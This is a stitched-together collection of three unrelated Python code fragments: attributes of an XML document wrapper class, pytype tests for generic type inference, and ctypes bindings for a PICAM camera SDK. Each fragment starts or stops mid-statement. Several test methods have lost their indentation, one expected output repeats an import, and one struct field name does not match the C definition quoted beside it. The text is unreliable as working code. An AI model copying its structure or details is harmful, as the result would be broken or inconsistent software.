(NOTE: getpath() results are not compatible with find())
XPaths and find() vs. xpath()
-----------------------------
find() is a lighter-weight call that still has some matching
capability but is quite a bit simpler.
The big difference is that find() does not handle leading
slashes in the path. So with find, you can't specify
"/chx:checklist/chx:checkitem[3]", you must just specify
"chx:checkitem[3].
For both, the main tag is the context node for the search.
So just leave off the leading slash and main tag name from
the search, and everything will work as expected.
"""
# Please consider all class variables to be private!
doc=None # lxml etree document representation !!! private!!!
olddoc=None # when unlocked, doc is none, olddoc is reference to old, unused document
filehref=None # Currently set href (formerly filename), or None
_filename=None # private filename, for convenience... should always be equal to href.getpath()
contexthref=None # If href is None, this dc_value.hrefvalue is the contextual
# location.
nsmap=None # prefix-to-namespace mapping
namespaces=None # copy of nsmap for xpath queries with None element removed
modified=None # Has the tree been modified since the last flush?
resyncnotify=None # List of recipients to notify after each resync
# autoflush=None # Automatically flush on modification?
# autoresync=None # If set, resync() will be be called automatically when
# before elements that are synced with paramdb2 are
# updated.
# (In general, you should manually resync immediately
# before changing the document, but be warned that
# elements need to be re-found once you do this!)
readonly=None # True if writing is disabled.
use_databrowse=None # True if we should use databrowse to read input.
extensions=None # list of xpath extensions to provide by default
num_backups=None # Number of backup files to keep when writing
use_locking=None # Use file locking
nodialogs=None # disable GUI dialogs
debug=None # Enable paranoid debugging?
debug_last_serialized=None # for debugging... copy of last serialized version
lastfileinfo=None # Class fileinfo for most recently seen on-disk copy
ro_lockcount=None # no. of times locked readonly
rw_lockcount=None # no. of times locked readwrite
lockfd=None # file descriptor currently used for locking, or -1. If this is not -1 then this decriptor is locked. This should be close()'d when you unlock. This should always be set if ro_lockcount or rw_lockcount > 0 and filename is set, cleared otherwise
lockfh=None # file handle currently used for locking, for NT which requires that the file be left open and reused
possible_root_ids=None # set of id() values that we will | |
"""Tests for handling GenericType."""
from pytype import file_utils
from pytype.tests import test_base
class GenericTest(test_base.BaseTest):
"""Tests for GenericType."""
  def test_basic(self):
    """A function returning an instance of a parameterized pyi class."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import List, TypeVar
        T = TypeVar("T")
        class A(List[T]): pass
        def f() -> A[int]: ...
      """)
      ty = self.Infer("""
        import a
        def f():
          return a.f()
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        import a
        def f() -> a.A[int]: ...
      """)
  def test_binop(self):
    """List concatenation on a generic subclass yields the element type."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import List, TypeVar
        T = TypeVar("T")
        class A(List[T]): pass
      """)
      ty = self.Infer("""
        from a import A
        def f():
          return A() + [42]
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        from typing import List, Type
        A = ... # type: Type[a.A]
        def f() -> List[int]: ...
      """)
  def test_specialized(self):
    """Parameters fixed by a specialized subclass propagate to its uses."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import Dict, TypeVar
        K = TypeVar("K")
        V = TypeVar("V")
        class A(Dict[K, V]): pass
        class B(A[str, int]): pass
      """)
      ty = self.Infer("""
        import a
        def foo():
          return a.B()
        def bar():
          x = foo()
          return {list(x.keys())[0]: list(x.values())[0]}
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        import a
        def foo() -> a.B: ...
        def bar() -> dict[str, int]: ...
      """)
  def test_specialized_mutation(self):
    """Mutating an inherited container merges into the fixed parameter."""
    with file_utils.Tempdir() as d1:
      with file_utils.Tempdir() as d2:
        d1.create_file("a.pyi", """
          from typing import List, TypeVar
          T = TypeVar("T")
          class A(List[T]): pass
        """)
        d2.create_file("b.pyi", """
          import a
          class B(a.A[int]): pass
        """)
        ty = self.Infer("""
          import b
          def foo():
            x = b.B()
            x.extend(["str"])
            return x
          def bar():
            return foo()[0]
        """, pythonpath=[d1.path, d2.path])
        self.assertTypesMatchPytd(ty, """
          import b
          from typing import Union
          def foo() -> b.B: ...
          def bar() -> Union[int, str]: ...
        """)
  def test_specialized_partial(self):
    """A subclass may fix only some of its base's type parameters."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import Dict, TypeVar
        V = TypeVar("V")
        class A(Dict[str, V]): pass
        class B(A[int]): pass
      """)
      ty = self.Infer("""
        import a
        def foo():
          return a.A()
        def bar():
          return list(foo().keys())
        def baz():
          return a.B()
        def qux():
          return list(baz().items())
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        from typing import List, Tuple
        import a
        def foo() -> a.A[nothing]: ...
        def bar() -> List[str]: ...
        def baz() -> a.B: ...
        def qux() -> List[Tuple[str, int]]: ...
      """)
  def test_type_parameter(self):
    """A method returning a type parameter resolves through a subclass."""
    with file_utils.Tempdir() as d:
      d.create_file("foo.pyi", """
        from typing import Generic, TypeVar
        T = TypeVar("T")
        class A(Generic[T]):
          def bar(self) -> T: ...
        class B(A[int]): ...
      """)
      ty = self.Infer("""
        import foo
        def f():
          return foo.B().bar()
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        import foo
        def f() -> int: ...
      """)
  def test_type_parameter_renaming(self):
    """A base's parameter renamed by a subclass still tracks its values."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import List, TypeVar
        U = TypeVar("U")
        class A(List[U]): pass
        class B(A[int]): pass
      """)
      ty = self.Infer("""
        import a
        def foo():
          return a.A()
        def bar():
          return a.B()[0]
        def baz():
          x = a.B()
          x.extend(["str"])
          return x[0]
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        from typing import Union
        import a
        def foo() -> a.A[nothing]: ...
        def bar() -> int: ...
        def baz() -> Union[int, str]: ...
      """)
  def test_type_parameter_renaming_chain(self):
    """Renaming and mutation compose across a chain of generic bases."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import List, Set, TypeVar, Union
        A = TypeVar("A")
        B = TypeVar("B")
        class Foo(List[A]):
          def foo(self) -> None:
            self = Foo[Union[A, complex]]
        class Bar(Foo[B], Set[B]):
          def bar(self) -> B: ...
      """)
      ty = self.Infer("""
        import a
        def f():
          x = a.Bar([42])
          x.foo()
          x.extend(["str"])
          x.add(float(3))
          return x.bar()
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        from typing import Union
        import a
        def f() -> Union[int, float, complex, str]: ...
      """)
  def test_type_parameter_renaming_conflict1(self):
    """Two bases reusing one TypeVar name map to distinct parameters."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import Generic, Tuple, TypeVar
        T1 = TypeVar("T1")
        T2 = TypeVar("T2")
        T3 = TypeVar("T3")
        class A(Generic[T1]):
          def f(self) -> T1: ...
        class B(Generic[T1]):
          def g(self) -> T1: ...
        class C(A[T2], B[T3]):
          def __init__(self):
            self = C[int, str]
          def h(self) -> Tuple[T2, T3]: ...
      """)
      ty = self.Infer("""
        import a
        v1 = a.C().f()
        v2 = a.C().g()
        v3 = a.C().h()
      """, deep=False, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        from typing import Any, Tuple
        import a
        v1 = ... # type: int
        v2 = ... # type: str
        v3 = ... # type: Tuple[int, str]
      """)
  def test_type_parameter_renaming_conflict2(self):
    """Both bases' parameters bound to the same subclass TypeVar unify."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import Generic, TypeVar
        T1 = TypeVar("T1")
        T2 = TypeVar("T2")
        T3 = TypeVar("T3")
        class A(Generic[T1]):
          def f(self) -> T1: ...
        class B(Generic[T2]):
          def g(self) -> T2: ...
        class C(A[T3], B[T3]):
          def __init__(self):
            self = C[str]
      """)
      ty = self.Infer("""
        import a
        v = a.C().f()
        w = a.C().g()
      """, deep=False, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        import a
        v = ... # type: str
        w = ... # type: str
      """)
  def test_change_multiply_renamed_type_parameter(self):
    """Mutation through a multiply-renamed parameter merges its values."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import Generic, TypeVar
        T1 = TypeVar("T1")
        T2 = TypeVar("T2")
        T3 = TypeVar("T3")
        class A(Generic[T1]):
          def f(self):
            self = A[str]
        class B(Generic[T1]): ...
        class C(A[T2], B[T3]):
          def g(self):
            self= C[int, float]
      """)
      ty = self.Infer("""
        import a
        v = a.C()
        v.f()
        v.g()
      """, deep=False, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        from typing import Union
        import a
        # T1, T2, and T3 are all set to Any due to T1 being an alias for both
        # T2 and T3.
        v = ... # type: a.C[int, Union[float, int]]
      """)
  def test_type_parameter_deep(self):
    """A parameter forwarded through two generic layers resolves fully."""
    with file_utils.Tempdir() as d:
      d.create_file("foo.pyi", """
        from typing import Generic, TypeVar
        U = TypeVar("U")
        V = TypeVar("V")
        class A(Generic[U]):
          def bar(self) -> U: ...
        class B(A[V], Generic[V]): ...
        def baz() -> B[int]: ...
      """)
      ty = self.Infer("""
        import foo
        def f():
          return foo.baz().bar()
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        import foo
        def f() -> int: ...
      """)
def test_type_parameter_import(self):
with file_utils.Tempdir() as d1:
d1.create_file("a.pyi", """
T = TypeVar("T")
""")
with file_utils.Tempdir() as d2:
d2.create_file("b.pyi", """
from typing import Generic, Union
from a import T
class A(Generic[T]):
def __init__(self, x: T) -> None:
self = A[Union[int, T]]
def a(self) -> T: ...
""")
ty = self.Infer("""
import b
def f():
return b.A("hello world")
def g():
return b.A(3.14).a()
""", pythonpath=[d1.path, d2.path])
self.assertTypesMatchPytd(ty, """
import b
from typing import Union
def f() -> b.A[Union[int, str]]: ...
def g() -> Union[int, float]: ...
""")
  def test_type_parameter_conflict(self):
    """Conflicting parameter bindings from multiple bases stay unfilled."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import Generic, TypeVar
        T = TypeVar("T")
        K = TypeVar("K")
        V = TypeVar("V")
        class MyIterable(Generic[T]): pass
        class MyList(MyIterable[T]): pass
        class MyDict(MyIterable[K], Generic[K, V]): pass
        class Custom(MyDict[K, V], MyList[V]): pass
      """)
      ty = self.Infer("""
        import a
        x = a.Custom()
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        import a
        x = ... # type: a.Custom[nothing, nothing]
      """)
def test_type_parameter_ambiguous(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Generic, List
T = TypeVar("T")
class A(Generic[T]): pass
class B(A[int]): pass
class C(List[T], B): pass
""")
ty = self.Infer("""
import a
def f():
x = a.C()
return x
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
def f() -> a.C[nothing]: ...
""")
def test_type_parameter_duplicated(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Generic, Dict
T = TypeVar("T")
class A(Dict[T, T], Generic[T]): pass
""")
ty = self.Infer("""
import a
def f():
x = a.A()
x[1] = 2
return x
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
import a
def f() -> a.A[int]: ...
""")
  def test_union(self):
    """A base parameterized with a Union propagates the union to lookups."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import List, Union
        class A(List[Union[int, str]]): pass
      """)
      ty = self.Infer("""
        import a
        def f():
          return a.A()
        def g():
          return f()[0]
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        from typing import Union
        import a
        def f() -> a.A: ...
        def g() -> Union[int, str]: ...
      """)
  def test_multiple_templates(self):
    """Filling one base's parameter leaves an unrelated one as nothing."""
    with file_utils.Tempdir() as d:
      d.create_file("a.pyi", """
        from typing import Generic, List, TypeVar
        K = TypeVar("K")
        V = TypeVar("V")
        class MyDict(Generic[K, V]): pass
        class A(MyDict[K, V], List[V]): pass
      """)
      ty = self.Infer("""
        import a
        def f():
          x = a.A()
          x.extend([42])
          return x
      """, pythonpath=[d.path])
      self.assertTypesMatchPytd(ty, """
        import a
        def f() -> a.A[nothing, int]: ...
      """)
def test_multiple_templates_flipped(self):
with file_utils.Tempdir() as d:
d.create_file("a.pyi", """
from typing import Dict, Generic, TypeVar
K = TypeVar("K")
V = TypeVar("V")
class MyList(Generic[V]):
def __getitem__(self, x: int) -> V: ...
class A(MyList[V], Dict[K, V]):
def a(self) -> K: ...
""")
ty = self.Infer("""
import a
def f():
x = a.A()
x.update({"hello": 0})
return x
def g():
return f().a()
def h():
return f()[0]
""", pythonpath=[d.path])
self.assertTypesMatchPytd(ty, """
import a
def f() -> a.A[str, int]: ...
def g() -> str: ...
def h() | |
PicamModel_NirvanaST640 = 1301,
/*------------------------------------------------------------------------*/
/* NIRvana-LN Series (1102) ----------------------------------------------*/
/*------------------------------------------------------------------------*/
PicamModel_NirvanaLNSeries = 1100,
PicamModel_NirvanaLN640 = 1101
/*------------------------------------------------------------------------*/
} PicamModel;
"""
# Python mirror of the C ``PicamModel`` enum quoted in the string above;
# values must match the PICAM header exactly.
# NOTE(review): the name string here is "PicamModelEnum" while the sibling
# PI_Enum instances below pass the bare C enum name (e.g.
# "PicamComputerInterface") -- confirm whether the trailing "Enum" is
# intentional before changing it.
PicamModelEnum = PI_Enum(
    "PicamModelEnum", dict(
        #/*------------------------------------------------------------------------*/
        #/* PI-MTE Series (1419) --------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_PIMteSeries = 1400,
        #/* PI-MTE 1024 Series ----------------------------------------------------*/
        PicamModel_PIMte1024Series = 1401,
        PicamModel_PIMte1024F = 1402,
        PicamModel_PIMte1024B = 1403,
        PicamModel_PIMte1024BR = 1405,
        PicamModel_PIMte1024BUV = 1404,
        #/* PI-MTE 1024FT Series --------------------------------------------------*/
        PicamModel_PIMte1024FTSeries = 1406,
        PicamModel_PIMte1024FT = 1407,
        PicamModel_PIMte1024BFT = 1408,
        #/* PI-MTE 1300 Series ----------------------------------------------------*/
        PicamModel_PIMte1300Series = 1412,
        PicamModel_PIMte1300B = 1413,
        PicamModel_PIMte1300R = 1414,
        PicamModel_PIMte1300BR = 1415,
        #/* PI-MTE 2048 Series ----------------------------------------------------*/
        PicamModel_PIMte2048Series = 1416,
        PicamModel_PIMte2048B = 1417,
        PicamModel_PIMte2048BR = 1418,
        #/* PI-MTE 2K Series ------------------------------------------------------*/
        PicamModel_PIMte2KSeries = 1409,
        PicamModel_PIMte2KB = 1410,
        PicamModel_PIMte2KBUV = 1411,
        #/*------------------------------------------------------------------------*/
        #/* PIXIS Series (76) -----------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_PixisSeries = 0,
        #/* PIXIS 100 Series ------------------------------------------------------*/
        PicamModel_Pixis100Series = 1,
        PicamModel_Pixis100F = 2,
        PicamModel_Pixis100B = 6,
        PicamModel_Pixis100R = 3,
        PicamModel_Pixis100C = 4,
        PicamModel_Pixis100BR = 5,
        PicamModel_Pixis100BExcelon = 54,
        PicamModel_Pixis100BRExcelon = 55,
        PicamModel_PixisXO100B = 7,
        PicamModel_PixisXO100BR = 8,
        PicamModel_PixisXB100B = 68,
        PicamModel_PixisXB100BR = 69,
        #/* PIXIS 256 Series ------------------------------------------------------*/
        PicamModel_Pixis256Series = 26,
        PicamModel_Pixis256F = 27,
        PicamModel_Pixis256B = 29,
        PicamModel_Pixis256E = 28,
        PicamModel_Pixis256BR = 30,
        PicamModel_PixisXB256BR = 31,
        #/* PIXIS 400 Series ------------------------------------------------------*/
        PicamModel_Pixis400Series = 37,
        PicamModel_Pixis400F = 38,
        PicamModel_Pixis400B = 40,
        PicamModel_Pixis400R = 39,
        PicamModel_Pixis400BR = 41,
        PicamModel_Pixis400BExcelon = 56,
        PicamModel_Pixis400BRExcelon = 57,
        PicamModel_PixisXO400B = 42,
        PicamModel_PixisXB400BR = 70,
        #/* PIXIS 512 Series ------------------------------------------------------*/
        PicamModel_Pixis512Series = 43,
        PicamModel_Pixis512F = 44,
        PicamModel_Pixis512B = 45,
        PicamModel_Pixis512BUV = 46,
        PicamModel_Pixis512BExcelon = 58,
        PicamModel_PixisXO512F = 49,
        PicamModel_PixisXO512B = 50,
        PicamModel_PixisXF512F = 48,
        PicamModel_PixisXF512B = 47,
        #/* PIXIS 1024 Series -----------------------------------------------------*/
        PicamModel_Pixis1024Series = 9,
        PicamModel_Pixis1024F = 10,
        PicamModel_Pixis1024B = 11,
        PicamModel_Pixis1024BR = 13,
        PicamModel_Pixis1024BUV = 12,
        PicamModel_Pixis1024BExcelon = 59,
        PicamModel_Pixis1024BRExcelon = 60,
        PicamModel_PixisXO1024F = 16,
        PicamModel_PixisXO1024B = 14,
        PicamModel_PixisXO1024BR = 15,
        PicamModel_PixisXF1024F = 17,
        PicamModel_PixisXF1024B = 18,
        PicamModel_PixisXB1024BR = 71,
        #/* PIXIS 1300 Series -----------------------------------------------------*/
        PicamModel_Pixis1300Series = 51,
        PicamModel_Pixis1300F = 52,
        PicamModel_Pixis1300F_2 = 75,
        PicamModel_Pixis1300B = 53,
        PicamModel_Pixis1300BR = 73,
        PicamModel_Pixis1300BExcelon = 61,
        PicamModel_Pixis1300BRExcelon = 62,
        PicamModel_PixisXO1300B = 65,
        PicamModel_PixisXF1300B = 66,
        PicamModel_PixisXB1300R = 72,
        #/* PIXIS 2048 Series -----------------------------------------------------*/
        PicamModel_Pixis2048Series = 20,
        PicamModel_Pixis2048F = 21,
        PicamModel_Pixis2048B = 22,
        PicamModel_Pixis2048BR = 67,
        PicamModel_Pixis2048BExcelon = 63,
        PicamModel_Pixis2048BRExcelon = 74,
        PicamModel_PixisXO2048B = 23,
        PicamModel_PixisXF2048F = 25,
        PicamModel_PixisXF2048B = 24,
        #/* PIXIS 2K Series -------------------------------------------------------*/
        PicamModel_Pixis2KSeries = 32,
        PicamModel_Pixis2KF = 33,
        PicamModel_Pixis2KB = 34,
        PicamModel_Pixis2KBUV = 36,
        PicamModel_Pixis2KBExcelon = 64,
        PicamModel_PixisXO2KB = 35,
        #/*------------------------------------------------------------------------*/
        #/* Quad-RO Series (104) --------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_QuadroSeries = 100,
        PicamModel_Quadro4096 = 101,
        PicamModel_Quadro4096_2 = 103,
        PicamModel_Quadro4320 = 102,
        #/*------------------------------------------------------------------------*/
        #/* ProEM Series (214) ----------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_ProEMSeries = 200,
        #/* ProEM 512 Series ------------------------------------------------------*/
        PicamModel_ProEM512Series = 203,
        PicamModel_ProEM512B = 201,
        PicamModel_ProEM512BK = 205,
        PicamModel_ProEM512BExcelon = 204,
        PicamModel_ProEM512BKExcelon = 206,
        #/* ProEM 1024 Series -----------------------------------------------------*/
        PicamModel_ProEM1024Series = 207,
        PicamModel_ProEM1024B = 202,
        PicamModel_ProEM1024BExcelon = 208,
        #/* ProEM 1600 Series -----------------------------------------------------*/
        PicamModel_ProEM1600Series = 209,
        PicamModel_ProEM1600xx2B = 212,
        PicamModel_ProEM1600xx2BExcelon = 210,
        PicamModel_ProEM1600xx4B = 213,
        PicamModel_ProEM1600xx4BExcelon = 211,
        #/*------------------------------------------------------------------------*/
        #/* ProEM+ Series (614) ---------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_ProEMPlusSeries = 600,
        #/* ProEM+ 512 Series -----------------------------------------------------*/
        PicamModel_ProEMPlus512Series = 603,
        PicamModel_ProEMPlus512B = 601,
        PicamModel_ProEMPlus512BK = 605,
        PicamModel_ProEMPlus512BExcelon = 604,
        PicamModel_ProEMPlus512BKExcelon = 606,
        #/* ProEM+ 1024 Series ----------------------------------------------------*/
        PicamModel_ProEMPlus1024Series = 607,
        PicamModel_ProEMPlus1024B = 602,
        PicamModel_ProEMPlus1024BExcelon = 608,
        #/* ProEM+ 1600 Series ----------------------------------------------------*/
        PicamModel_ProEMPlus1600Series = 609,
        PicamModel_ProEMPlus1600xx2B = 612,
        PicamModel_ProEMPlus1600xx2BExcelon = 610,
        PicamModel_ProEMPlus1600xx4B = 613,
        PicamModel_ProEMPlus1600xx4BExcelon = 611,
        #/*------------------------------------------------------------------------*/
        #/* ProEM-HS Series (1209) ------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_ProEMHSSeries = 1200,
        #/* ProEM-HS 512 Series ---------------------------------------------------*/
        PicamModel_ProEMHS512Series = 1201,
        PicamModel_ProEMHS512B = 1202,
        PicamModel_ProEMHS512BK = 1207,
        PicamModel_ProEMHS512BExcelon = 1203,
        PicamModel_ProEMHS512BKExcelon = 1208,
        #/* ProEM-HS 1024 Series --------------------------------------------------*/
        PicamModel_ProEMHS1024Series = 1204,
        PicamModel_ProEMHS1024B = 1205,
        PicamModel_ProEMHS1024BExcelon = 1206,
        #/*------------------------------------------------------------------------*/
        #/* PI-MAX3 Series (303) --------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_PIMax3Series = 300,
        PicamModel_PIMax31024I = 301,
        PicamModel_PIMax31024x256 = 302,
        #/*------------------------------------------------------------------------*/
        #/* PI-MAX4 Series (721) --------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_PIMax4Series = 700,
        #/* PI-MAX4 1024i Series --------------------------------------------------*/
        PicamModel_PIMax41024ISeries = 703,
        PicamModel_PIMax41024I = 701,
        PicamModel_PIMax41024IRF = 704,
        #/* PI-MAX4 1024f Series --------------------------------------------------*/
        PicamModel_PIMax41024FSeries = 710,
        PicamModel_PIMax41024F = 711,
        PicamModel_PIMax41024FRF = 712,
        #/* PI-MAX4 1024x256 Series -----------------------------------------------*/
        PicamModel_PIMax41024x256Series = 705,
        PicamModel_PIMax41024x256 = 702,
        PicamModel_PIMax41024x256RF = 706,
        #/* PI-MAX4 2048 Series ---------------------------------------------------*/
        PicamModel_PIMax42048Series = 716,
        PicamModel_PIMax42048F = 717,
        PicamModel_PIMax42048B = 718,
        PicamModel_PIMax42048FRF = 719,
        PicamModel_PIMax42048BRF = 720,
        #/* PI-MAX4 512EM Series --------------------------------------------------*/
        PicamModel_PIMax4512EMSeries = 708,
        PicamModel_PIMax4512EM = 707,
        PicamModel_PIMax4512BEM = 709,
        #/* PI-MAX4 1024EM Series -------------------------------------------------*/
        PicamModel_PIMax41024EMSeries = 713,
        PicamModel_PIMax41024EM = 715,
        PicamModel_PIMax41024BEM = 714,
        #/*------------------------------------------------------------------------*/
        #/* PyLoN Series (439) ----------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_PylonSeries = 400,
        #/* PyLoN 100 Series ------------------------------------------------------*/
        PicamModel_Pylon100Series = 418,
        PicamModel_Pylon100F = 404,
        PicamModel_Pylon100B = 401,
        PicamModel_Pylon100BR = 407,
        PicamModel_Pylon100BExcelon = 425,
        PicamModel_Pylon100BRExcelon = 426,
        #/* PyLoN 256 Series ------------------------------------------------------*/
        PicamModel_Pylon256Series = 419,
        PicamModel_Pylon256F = 409,
        PicamModel_Pylon256B = 410,
        PicamModel_Pylon256E = 411,
        PicamModel_Pylon256BR = 412,
        #/* PyLoN 400 Series ------------------------------------------------------*/
        PicamModel_Pylon400Series = 420,
        PicamModel_Pylon400F = 405,
        PicamModel_Pylon400B = 402,
        PicamModel_Pylon400BR = 408,
        PicamModel_Pylon400BExcelon = 427,
        PicamModel_Pylon400BRExcelon = 428,
        #/* PyLoN 1024 Series -----------------------------------------------------*/
        PicamModel_Pylon1024Series = 421,
        PicamModel_Pylon1024B = 417,
        PicamModel_Pylon1024BExcelon = 429,
        #/* PyLoN 1300 Series -----------------------------------------------------*/
        PicamModel_Pylon1300Series = 422,
        PicamModel_Pylon1300F = 406,
        PicamModel_Pylon1300B = 403,
        PicamModel_Pylon1300R = 438,
        PicamModel_Pylon1300BR = 432,
        PicamModel_Pylon1300BExcelon = 430,
        PicamModel_Pylon1300BRExcelon = 433,
        #/* PyLoN 2048 Series -----------------------------------------------------*/
        PicamModel_Pylon2048Series = 423,
        PicamModel_Pylon2048F = 415,
        PicamModel_Pylon2048B = 434,
        PicamModel_Pylon2048BR = 416,
        PicamModel_Pylon2048BExcelon = 435,
        PicamModel_Pylon2048BRExcelon = 436,
        #/* PyLoN 2K Series -------------------------------------------------------*/
        PicamModel_Pylon2KSeries = 424,
        PicamModel_Pylon2KF = 413,
        PicamModel_Pylon2KB = 414,
        PicamModel_Pylon2KBUV = 437,
        PicamModel_Pylon2KBExcelon = 431,
        #/*------------------------------------------------------------------------*/
        #/* PyLoN-IR Series (904) -------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_PylonirSeries = 900,
        #/* PyLoN-IR 1024 Series --------------------------------------------------*/
        PicamModel_Pylonir1024Series = 901,
        PicamModel_Pylonir102422 = 902,
        PicamModel_Pylonir102417 = 903,
        #/*------------------------------------------------------------------------*/
        #/* PIoNIR Series (502) ---------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_PionirSeries = 500,
        PicamModel_Pionir640 = 501,
        #/*------------------------------------------------------------------------*/
        #/* NIRvana Series (802) --------------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_NirvanaSeries = 800,
        PicamModel_Nirvana640 = 801,
        #/*------------------------------------------------------------------------*/
        #/* NIRvana ST Series (1302) ----------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_NirvanaSTSeries = 1300,
        PicamModel_NirvanaST640 = 1301,
        #/*------------------------------------------------------------------------*/
        #/* NIRvana-LN Series (1102) ----------------------------------------------*/
        #/*------------------------------------------------------------------------*/
        PicamModel_NirvanaLNSeries = 1100,
        PicamModel_NirvanaLN640 = 1101
        #/*------------------------------------------------------------------------*/
    ))
"""
/*----------------------------------------------------------------------------*/
typedef enum PicamComputerInterface
{
PicamComputerInterface_Usb2 = 1,
PicamComputerInterface_1394A = 2,
PicamComputerInterface_GigabitEthernet = 3
} PicamComputerInterface; /* (4) */
"""
# Python mirror of the C ``PicamComputerInterface`` enum quoted above.
PicamComputerInterfaceEnum = PI_Enum(
    "PicamComputerInterface", dict(
        PicamComputerInterface_Usb2 = 1,
        PicamComputerInterface_1394A = 2,
        PicamComputerInterface_GigabitEthernet = 3
    ))
"""/*----------------------------------------------------------------------------*/
typedef enum PicamStringSize
{
PicamStringSize_SensorName = 64,
PicamStringSize_SerialNumber = 64,
PicamStringSize_FirmwareName = 64,
PicamStringSize_FirmwareDetail = 256
} PicamStringSize;
"""
# Python mirror of the C ``PicamStringSize`` enum quoted above: fixed
# buffer lengths for the strings embedded in PICAM structures (used below
# to size the PicamCameraID character arrays).
PicamStringSizeEnum = PI_Enum(
    "PicamStringSize", dict(
        PicamStringSize_SensorName = 64,
        PicamStringSize_SerialNumber = 64,
        PicamStringSize_FirmwareName = 64,
        PicamStringSize_FirmwareDetail = 256
    ))
"""
/*----------------------------------------------------------------------------*/
typedef struct PicamCameraID
{
PicamModel model;
PicamComputerInterface computer_interface;
pichar sensor_name[PicamStringSize_SensorName];
pichar serial_number[PicamStringSize_SerialNumber];
} PicamCameraID;
"""
class PicamCameraID(ctypes.Structure):
_fields_ = [("model", ctypes.c_int),
("PicamComputerInterface", ctypes.c_int),
("sensor_name", pichar * PicamStringSizeEnum.bysname['SensorName']),
("serial_number", pichar * PicamStringSizeEnum.bysname['SerialNumber'])
]
"""
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DestroyCameraIDs( const PicamCameraID* id_array );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetAvailableCameraIDs(
const PicamCameraID** id_array,
piint* id_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetUnavailableCameraIDs(
const PicamCameraID** id_array,
piint* id_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
PICAM_API Picam_IsCameraIDConnected(
const PicamCameraID* id,
pibln* connected );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_IsCameraIDOpenElsewhere(
const PicamCameraID* id,
pibln* open_elsewhere );
/*----------------------------------------------------------------------------*/
/* Camera Access -------------------------------------------------------------*/
/*----------------------------------------------------------------------------*/
typedef void* PicamHandle;
"""
PicamHandle = ctypes.c_void_p
"""
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DestroyHandles( const PicamHandle* handle_array );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_OpenFirstCamera( PicamHandle* camera );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_OpenCamera(
const PicamCameraID* id,
PicamHandle* camera );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_CloseCamera( PicamHandle camera );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetOpenCameras(
const PicamHandle** camera_array,
piint* camera_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
PICAM_API Picam_IsCameraConnected(
PicamHandle camera,
pibln* connected );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetCameraID(
PicamHandle camera,
PicamCameraID* id );
/*----------------------------------------------------------------------------*/
/* Camera Information --------------------------------------------------------*/
/*----------------------------------------------------------------------------*/
typedef struct PicamFirmwareDetail
{
pichar name[PicamStringSize_FirmwareName];
pichar detail[PicamStringSize_FirmwareDetail];
} PicamFirmwareDetail;
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DestroyFirmwareDetails(
const PicamFirmwareDetail* firmware_array );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetFirmwareDetails(
const PicamCameraID* id,
const PicamFirmwareDetail** firmware_array,
piint* firmware_count ); /* ALLOCATES */
/*----------------------------------------------------------------------------*/
/* Demo Camera ---------------------------------------------------------------*/
/*----------------------------------------------------------------------------*/
PICAM_API Picam_DestroyModels( const PicamModel* model_array );
/*----------------------------------------------------------------------------*/
PICAM_API Picam_GetAvailableDemoCameraModels(
